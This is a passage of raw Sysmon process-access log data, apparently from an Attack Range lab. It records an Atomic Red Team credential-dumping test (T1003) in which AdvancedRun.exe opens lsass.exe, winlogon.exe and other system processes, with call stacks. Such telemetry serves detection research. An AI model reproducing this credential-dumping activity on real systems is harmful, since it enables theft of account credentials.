Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943815Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943814Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943813Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943812Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003943811Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003943810Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943809Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943808Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943807Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943806Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943805Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943804Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943803Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943802Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943801Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943800Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam